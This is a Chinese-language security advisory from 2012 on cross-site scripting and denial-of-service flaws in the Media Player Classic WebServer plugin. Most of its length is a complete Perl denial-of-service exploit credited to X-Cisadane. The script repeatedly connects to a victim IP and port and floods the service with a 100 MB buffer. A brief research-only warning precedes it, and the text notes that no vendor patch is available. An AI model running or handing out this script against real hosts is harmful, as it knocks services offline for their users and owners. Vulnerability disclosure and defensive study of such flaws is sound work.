Media Player Classic WebServer跨站脚本执行和拒绝服务

发布日期：2012-11-16
更新日期：2012-11-19

受影响系统：
guliverkli Media Player Classic 6.4.9.1
guliverkli Media Player Classic 1.5 2827
guliverkli Media Player Classic 1.3.1752 0
guliverkli Media Player Classic 1.3.1333 0
guliverkli Media Player Classic  1.3.2189.0
guliverkli Media Player Classic  1.3.1774 0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56567

Media Player Classic (MPC) WebServer是基于Web的远程控制插件，属于Media Player Classic。

Media Player Classic WebServer在实现上存在跨站脚本执行漏洞和拒绝服务漏洞，攻击者可利用这些漏洞造成拒绝服务或在受影响站点的用户浏览器中执行任意代码。

<*来源：X-Cisadane
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
use IO::Socket::INET;
use Getopt::Std;
use Socket;
my $SOCKET = "";
$loop = 1000;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t*=============================================================*\n";
print "\t* ---    MPC WebServer Remote Denial Of Service            ---*\n";
print "\t* ---          By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
 
exit;
}

print "\t*=============================================================*\n";
print "\t* ---    MPC WebServer Remote Denial Of Service            ---*\n";
print "\t* ---          By : X-Cisadane                        ---*\n";
print "\t* ---  ------------------------------------------------    ---*\n";
print "\t* ---  Usage  : perl exploitmpc.pl ( Victim IP ) ( Port )  ---*\n";
print "\t* ---                                                      ---*\n";
print "\t*=============================================================*\n";
print "\n";
print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n";
print "Default Port for MPC Web Server is 13579\n";
print "\n";
print " Please Wait Till The Buffer is Done\n";
my $b1 = "\x41" x 100000000;

$iaddr = inet_aton($ip) || die "Unknown host: $ip\n";
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname('tcp') || die "getprotobyname: $!\n";

print "\n";
print " Attacking the Target, Please Wait Till Pwned \n";

for ($j=1;$j<$loop;$j++) {
socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n";

$DoS=IO::Socket::INET->new("$ip:$port") or die;
send(SOCKET,$b1, 0) || die "failure sent: $!\n";

print $DoS "stor $b1\n";
print $DoS "QUIT\n";

close $DoS;
close SOCKET;
}
# exit :

建议：
--------------------------------------------------------------------------------
厂商补丁：

guliverkli
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：